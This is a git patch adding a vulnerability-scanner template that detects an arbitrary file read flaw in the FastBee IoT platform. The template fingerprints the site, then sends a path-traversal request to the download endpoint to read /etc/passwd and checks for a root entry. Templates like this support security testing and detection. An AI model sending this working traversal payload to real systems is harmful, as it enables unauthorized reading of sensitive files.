From 426d6ff7eed3216c7b7f7beebca019a665a22cf2 Mon Sep 17 00:00:00 2001
From: Kazgangap <halilkirazkaya@yandex.com>
Date: Mon, 2 Sep 2024 15:35:47 +0300
Subject: [PATCH] add fastbee lfi

---
 .../other/fastbee-arbitrary-file-read.yaml    | 53 +++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml

diff --git a/http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml b/http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml
new file mode 100644
index 0000000000..56d6a8804e
--- /dev/null
+++ b/http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml
@@ -0,0 +1,53 @@
+id: fastbee-arbitrary-file-read
+
+info:
+  name: FastBee - Local File Inclusion
+  author: s4e-io
+  severity: high
+  description: |
+    Arbitrary file read vulnerability exists in FastBee IoT platform download, which may lead to sensitive information leakage, data theft and other security risks, thus causing serious harm to the system and users.
+  reference:
+    - https://blog.csdn.net/weixin_43167326/article/details/141806542
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: fastbee
+    product: fastbee
+    fofa-query: "fastbee"
+  tags: fastbee,iot,lfi
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"<title>FastBee")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+
+      - type: word
+        part: content_type
+        words:
+          - 'application/octet-stream'
+
+      - type: status
+        status:
+          - 200